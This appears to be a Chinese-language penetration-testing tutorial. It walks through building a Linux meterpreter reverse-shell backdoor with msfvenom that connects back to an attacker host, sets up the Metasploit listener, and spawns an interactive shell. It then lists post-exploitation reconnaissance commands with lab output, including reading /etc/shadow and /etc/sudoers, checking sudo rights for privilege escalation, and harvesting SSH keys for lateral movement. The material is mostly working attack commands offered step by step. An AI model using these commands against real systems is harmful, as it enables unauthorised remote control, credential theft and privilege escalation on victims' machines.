1.用 msfvenom 生成 payload（反向连接的后门程序，下文称"病毒"）
设置攻击机的 IP 地址和监听端口，生成 msfvm3.elf 文件，传到要攻击的 Linux 系统上（需 `chmod +x msfvm3.elf` 后再执行），我这里演示的是 Ubuntu 系统。
msfvenom -p linux/x64/meterpreter_reverse_tcp lhost=xx.xx.xx.xx lport=6666 -f elf > msfvm3.elf
在本地机器上开启msf监听,IP地址和端口设置成病毒对应的地址端口,payload也要对应。
use exploit/multi/handler
set payload linux/x64/meterpreter_reverse_tcp
set lhost xx.xx.xx.xx
set lport 6666
run
2.拿到靶机的meterpreter
靶机上线后，拿到 meterpreter 会话，输入下面的命令用 python 起一个 pty，得到可交互的靶机终端。
shell python -c "import pty;pty.spawn('/bin/bash')"
如果提示找不到 python，把 python 改成 python3（后面 ps 的输出里实际运行的就是 python3）。
3.常见的信息收集指令（每条命令后 `//` 之后的内容是说明文字，不是命令的一部分；shell 里 `//` 不是注释，原样输入会被当成参数）
1.主机信息
uname -a //显示内核版本、架构等主机信息（判断能否用内核漏洞提权时要看这个）
azheng@ubuntu:~/Desktop$ uname -a uname -a Linux ubuntu 4.15.0-29-generic #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
cat /etc/lsb-release //查看主机系统的发行版本
root@ubuntu:~# cat /etc/lsb-release cat /etc/lsb-release DISTRIB_ID=Ubuntu DISTRIB_RELEASE=18.04 DISTRIB_CODENAME=bionic DISTRIB_DESCRIPTION="Ubuntu 18.04.1 LTS"
cat /proc/version //查看内核
cat /proc/version Linux version 4.15.0-29-generic (buildd@lgw01-amd64-057) (gcc version 7.3.0 (Ubuntu 7.3.0-16ubuntu3)) #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018
ps -ef //查看全部进程（也可用 ps aux）；注意 ps -all 只列出关联了终端的进程，看不到守护进程
azheng@ubuntu:~/Desktop$ ps PID TTY TIME CMD 19894 pts/1 00:00:00 bash 20345 pts/1 00:00:00 msfvm3.elf 20401 pts/1 00:00:00 sh 20402 pts/1 00:00:00 python3 20513 pts/1 00:00:00 ps
kill //结束进程（先用默认的 SIGTERM 让进程正常退出，无效时再用 -9 强制）
azheng@ubuntu:~/Desktop$ kill 20513 //20513 为进程号；进程不退出时再 kill -9 20513。注意写成 -20513（带负号）会被解释为"进程组 20513"而不是单个进程；另外 20345 是 msfvm3.elf 自己，杀掉它会断开当前会话
top //显示当前处理器活动和任务
azheng@ubuntu:~/Desktop$ top top - 09:57:47 up 23:43, 2 users, load average: 0.00, 0.00, 0.00 Tasks: 307 total, 1 running, 235 sleeping, 0 stopped, 0 zombie %Cpu(s): 0.0 us, 0.0 sy, 0.0 ni,100.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st KiB Mem : 4015692 total, 212900 free, 1408804 used, 2393988 buff/cache KiB Swap: 969960 total, 969692 free, 268 used. 2301292 avail Mem PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 588 root 20 0 110508 3536 3152 S 0.3 0.1 0:06.56 irqbalance 1380 gdm 20 0 405816 22564 6576 S 0.3 0.6 5:56.92 Xwayland 120599 azheng 20 0 44224 3996 3180 R 0.3 0.1 0:00.09 top 1 root 20 0 225760 9768 6916 S 0.0 0.2 0:08.68 systemd 2 root 20 0 0 0 0 S 0.0 0.0 0:00.02 kthreadd 4 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 kworker/0:0H 6 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 mm_percpu_wq 7 root 20 0 0 0 0 S 0.0 0.0 0:00.92 ksoftirqd/0 8 root 20 0 0 0 0 I 0.0 0.0 0:01.83 rcu_sched 9 root 20 0 0 0 0 I 0.0 0.0 0:00.00 rcu_bh 10 root rt 0 0 0 0 S 0.0 0.0 0:00.04 migration/0 11 root rt 0 0 0 0 S 0.0 0.0 0:00.14 watchdog/0 12 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuhp/0 13 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuhp/1 14 root rt 0 0 0 0 S 0.0 0.0 0:00.15 watchdog/1
netstat -anltup //查看网络状态（-p 只有 root 才能看到所有进程名；新版 Ubuntu 默认不带 net-tools，可用 ss -anltup 代替）。注意下面输出里 ./msfvm3.elf 到 192.168.94.128:6666 的 ESTABLISHED 连接就是本次 meterpreter 回连，防守方同样能在这里看到它
root@ubuntu:~# netstat -anltup Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN 101750/systemd-reso tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 31597/sshd tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 117693/cupsd tcp 0 0 127.0.0.1:6010 0.0.0.0:* LISTEN 19864/sshd: azheng@ tcp 0 0 192.168.94.130:22 192.168.94.1:45483 ESTABLISHED 19762/sshd: azheng tcp 0 0 192.168.94.130:55760 185.125.188.54:443 ESTABLISHED 2373/snapd tcp 0 208 192.168.94.130:22 192.168.94.1:45482 ESTABLISHED 19760/sshd: azheng tcp 0 0 192.168.94.130:58612 192.168.94.128:6666 ESTABLISHED 20345/./msfvm3.elf tcp6 0 0 :::22 :::* LISTEN 31597/sshd tcp6 0 0 ::1:631 :::* LISTEN 117693/cupsd
ifconfig -a //查看网卡信息（没有 net-tools 时用 ip addr）
hostname //查看主机名称
2.用户信息
w //查看用户信息
azheng@ubuntu:~/Desktop$ w 09:59:25 up 23:44, 2 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT azheng :0 :0 Mon10 ?xdm? 2:23 0.00s /usr/lib/gdm3/gdm-x-session azheng pts/1 192.168.xx.x Mon10 0.00s 5.16s 0.00s w
whoami //显示当前用户
last //查看最近的登录信息（读取 /var/log/wtmp；失败登录用 lastb，需要 root）
azheng@ubuntu:~/Desktop$ last azheng pts/1 192.168.xx.x Mon Oct 9 10:53 still logged in azheng pts/1 192.168.xx.x Mon Oct 9 10:35 - 10:49 (00:13) azheng :0 :0 Mon Oct 9 10:22 still logged in wtmp begins Mon Oct 9 10:22:49 2023
cat /etc/passwd //查看用户信息数据库
cat /etc/shadow //查看用户密码哈希（只有 root 或 shadow 组可读，普通用户会 Permission denied）
cat /etc/sudoers //查看sudo命令的使用规则（文件权限 0440，需要 root；规则还可能写在被 #includedir 引入的 /etc/sudoers.d/ 下，要一并查看）
# User privilege specification root ALL=(ALL:ALL) ALL # Members of the admin group may gain root privileges %admin ALL=(ALL) ALL # Allow members of group sudo to execute any command %sudo ALL=(ALL:ALL) ALL # See sudoers(5) for more information on "#include" directives: #includedir /etc/sudoers.d
sudo -l //列出当前用户可通过 sudo 执行的命令。提权时应以低权限用户（如 azheng）运行，下面 root 的结果只是示例；可能会要求输入密码，在非交互 shell 里可加 -n 避免挂住
root@ubuntu:~# sudo -l Matching Defaults entries for root on ubuntu: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User root may run the following commands on ubuntu: (ALL : ALL) ALL
3.ssh信息
cat /etc/ssh/sshd_config //查看服务器ssh配置信息（下面示例取自 Kali 攻击机，靶机上同样执行；配置里有 Include /etc/ssh/sshd_config.d/*.conf，实际生效值以 root 运行 sshd -T 的输出为准）
┌──(root㉿kali)-[~/Desktop] └─# cat /etc/ssh/sshd_config # This is the sshd server system-wide configuration file. See # sshd_config(5) for more information. # This sshd was compiled with PATH=/usr/local/bin:/usr/bin:/bin:/usr/games # The strategy used for options in the default sshd_config shipped with # OpenSSH is to specify options with their default value where # possible, but leave them commented. Uncommented options override the # default value. Include /etc/ssh/sshd_config.d/*.conf #Port 22 #AddressFamily any #ListenAddress 0.0.0.0 #ListenAddress :: #HostKey /etc/ssh/ssh_host_rsa_key #HostKey /etc/ssh/ssh_host_ecdsa_key #HostKey /etc/ssh/ssh_host_ed25519_key # Ciphers and keying #RekeyLimit default none
cat /etc/ssh/ssh_config //查看客户端ssh配置信息（同样是 Kali 上的示例）；横向移动时更有价值的是各用户 ~/.ssh/ 下的 config、known_hosts 和私钥文件
┌──(root㉿kali)-[~/Desktop] └─# cat /etc/ssh/ssh_config # This is the ssh client system-wide configuration file. See # ssh_config(5) for more information. This file provides defaults for # users, and the values can be changed in per-user configuration files # or on the command line. # Configuration data is parsed as follows: # 1. command line options # 2. user-specific file # 3. system-wide file # Any configuration value is only changed the first time it is set. # Thus, host-specific definitions should be at the beginning of the # configuration file, and defaults at the end. # Site-wide defaults for some commonly used options. For a comprehensive # list of available options, their meanings and defaults, please see the # ssh_config(5) man page. Include /etc/ssh/ssh_config.d/*.conf Host * # ForwardAgent no # ForwardX11 no # ForwardX11Trusted yes PasswordAuthentication yes
4.服务状态信息
service --status-all //+代表开启 -代表关闭 ?代表无法判断；systemd 系统上更准确的是 systemctl list-units --type=service --state=running（下面输出取自 Kali）
┌──(root㉿kali)-[~/Desktop] └─# service --status-all [ - ] apache-htcacheclean [ - ] apache2 [ - ] apparmor [ - ] atftpd [ - ] bluetooth [ - ] console-setup.sh [ + ] cron
cat /etc/services //查看端口号与服务名的默认映射（静态 IANA 表，不代表本机实际开放的端口；实际监听端口看前面的 netstat/ss）
┌──(root㉿kali)-[~/Desktop] └─# cat /etc/services # Network services, Internet style # # Updated from https://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml . # # New ports will be added on request if they have been officially assigned # by IANA and used in the real-world or are needed by a debian package. # If you need a huge list of used numbers please install the nmap package. tcpmux 1/tcp # TCP port service multiplexer echo 7/tcp echo 7/udp discard 9/tcp sink null discard 9/udp sink null systat 11/tcp users daytime 13/tcp daytime 13/udp netstat 15/tcp qotd 17/tcp quote chargen 19/tcp ttytst source chargen 19/udp ttytst source ftp-data 20/tcp ftp 21/tcp fsp 21/udp fspd ssh 22/tcp # SSH Remote Login Protocol telnet 23/tcp smtp 25/tcp mail time 37/tcp timserver time 37/udp timserver whois 43/tcp nicname
iptables -L -n -v //查看防火墙策略（需要 root；-n 不做 DNS 反查，-v 显示接口和计数；另外查看 -t nat 表；使用 nftables 的系统用 nft list ruleset）